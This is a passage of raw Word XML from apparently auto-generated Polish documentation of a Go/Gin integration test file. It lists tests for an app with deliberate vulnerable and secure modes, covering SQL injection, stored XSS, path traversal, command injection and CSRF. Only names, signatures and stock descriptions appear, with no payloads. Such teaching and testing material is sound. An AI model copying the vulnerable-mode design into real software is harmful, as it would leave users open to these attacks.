      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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method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path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body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cookie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*httptest.ResponseRecorder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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="194" w:name="sec194"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.22. responseCookieValue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194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main_integration_test.go:107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responseCookieValue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resp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httptest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ResponseRecorder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name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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2139" w:name="lst139"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 139. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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resp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*httptest.ResponseRecorder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name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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="195" w:name="sec195"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.23. extractCreatedID</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195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main_integration_test.go:118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extractCreatedID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byte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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2140" w:name="lst140"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 140. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[]byte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196" w:name="sec196"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.24. TestIntegration_Ping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196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main_integration_test.go:147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TestIntegration_Ping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41" w:name="lst141"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 141. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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197" w:name="sec197"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.25. TestIntegration_Posts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197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main_integration_test.go:166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TestIntegration_Posts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42" w:name="lst142"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 142. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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198" w:name="sec198"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.26. TestIntegration_Login</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198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main_integration_test.go:191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TestIntegration_Login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43" w:name="lst143"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 143. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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199" w:name="sec199"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.27. TestIntegration_DatabaseFileIsCreated</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199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main_integration_test.go:217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TestIntegration_DatabaseFileIsCreated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44" w:name="lst144"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 144. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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00" w:name="sec200"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.28. TestIntegration_UI_PostsPage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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main_integration_test.go:226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TestIntegration_UI_PostsPage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45" w:name="lst145"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 145. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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01" w:name="sec201"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.29. TestIntegration_UI_LoginPage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201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main_integration_test.go:245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TestIntegration_UI_LoginPage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46" w:name="lst146"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 146. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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02" w:name="sec202"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.30. TestIntegration_UI_LoginSubmit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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main_integration_test.go:264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TestIntegration_UI_LoginSubmit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47" w:name="lst147"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 147. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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03" w:name="sec203"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.31. TestIntegration_UI_PostsPartial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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main_integration_test.go:289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TestIntegration_UI_PostsPartial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48" w:name="lst148"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 148. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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04" w:name="sec204"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.32. TestIntegration_UI_LoginPartial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204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main_integration_test.go:308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TestIntegration_UI_LoginPartial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49" w:name="lst149"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 149. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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05" w:name="sec205"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.33. TestIntegration_UIModeToggle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205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main_integration_test.go:345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TestIntegration_UIModeToggle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50" w:name="lst150"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 150. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215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06" w:name="sec206"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.34. TestIntegration_SeedDB_RewritesDemoCredentialsForSecurityMode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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main_integration_test.go:384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TestIntegration_SeedDB_RewritesDemoCredentialsForSecurityMode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51" w:name="lst151"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 151. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215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07" w:name="sec207"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.35. TestIntegration_SecureAuthCookieIsSignedAndSameSiteStrict</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207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main_integration_test.go:417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TestIntegration_SecureAuthCookieIsSignedAndSameSiteStrict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52" w:name="lst152"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 152. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215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08" w:name="sec208"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.36. TestIntegration_CSRFSecureFormRejectsAndAcceptsTokens</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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main_integration_test.go:449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TestIntegration_CSRFSecureFormRejectsAndAcceptsTokens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53" w:name="lst153"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 153. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215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09" w:name="sec209"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.37. TestIntegration_ProfileEndpointHonorsSecurityModeForCSRF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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main_integration_test.go:488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TestIntegration_ProfileEndpointHonorsSecurityModeForCSRF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54" w:name="lst154"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 154. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215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10" w:name="sec210"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.38. TestIntegration_Register</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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main_integration_test.go:552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TestIntegration_Register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55" w:name="lst155"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 155. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215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11" w:name="sec211"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.39. TestIntegration_DeleteAuthorization_SecurityEnabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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main_integration_test.go:580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TestIntegration_DeleteAuthorization_SecurityEnabled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56" w:name="lst156"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 156. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2156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12" w:name="sec212"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.40. decodeSearchResults</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212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main_integration_test.go:634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decodeSearchResults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byte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map</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[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]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any</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2157" w:name="lst157"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 157. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2157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body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[]byte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[]map[string]any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213" w:name="sec213"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.41. TestIntegration_SearchSQLi_VulnerableMode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213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main_integration_test.go:645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TestIntegration_SearchSQLi_VulnerableMode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58" w:name="lst158"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 158. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2158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14" w:name="sec214"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.42. TestIntegration_SearchSQLi_SecureMode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214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main_integration_test.go:831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TestIntegration_SearchSQLi_SecureMode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59" w:name="lst159"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 159. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2159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15" w:name="sec215"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.43. TestIntegration_CreateDeleteRequireLogin_DefaultMode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215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main_integration_test.go:948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TestIntegration_CreateDeleteRequireLogin_DefaultMode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60" w:name="lst160"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 160. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2160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16" w:name="sec216"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.44. postCommentForm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Widoczność:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wewnętrzna/nieeksportowana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main_integration_test.go:994</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja pomocnicza używana przez pakiet; szczegóły wejść i wyjść wynikają z sygnatury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postCommentForm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router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gin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Engine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postID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int</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>,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body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b/>
                <w:color w:val="7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>string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httptest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ResponseRecorder</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2161" w:name="lst161"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 161. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2161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router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Engine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postID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - parametr przekazywany do funkcji/metody.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>string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rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(anonimowe)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*httptest.ResponseRecorder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - wartość zwracana przez funkcję/metodę.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Uwagi wykonawcze:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja jest wywoływana bezpośrednio z kodu projektu; walidacja błędów jest sygnalizowana przez zwracane </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, status HTTP albo efekt w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>gin.Context</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="217" w:name="sec217"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.45. TestIntegration_StoredXSS_VulnerableMode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217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main_integration_test.go:1001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TestIntegration_StoredXSS_VulnerableMode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62" w:name="lst162"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 162. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2162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18" w:name="sec218"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.46. TestIntegration_StoredXSS_SecureMode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218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main_integration_test.go:1051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TestIntegration_StoredXSS_SecureMode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63" w:name="lst163"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 163. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2163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19" w:name="sec219"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.47. TestIntegration_PathTraversal_LFI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219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main_integration_test.go:1118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TestIntegration_PathTraversal_LFI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64" w:name="lst164"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 164. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2164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p>
      <w:bookmarkStart w:id="220" w:name="sec220"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.48. TestIntegration_CommandInjection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Widoczność:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eksportowana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Lokalizacja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main_integration_test.go:1169</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> test integracyjny weryfikujący zachowanie aplikacji w scenariuszu opisanym nazwą funkcji _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sygnatura: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pStyle w:val="NoSpacing"/>
              <w:keepLines/>
              <w:spacing w:line="240" w:lineRule="auto" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:color w:val="7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>func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111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TestIntegration_CommandInjection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>(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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="BE185D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2165" w:name="lst165"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 165. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2165"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*testing.T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - parametr przekazywany do funkcji/metody.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
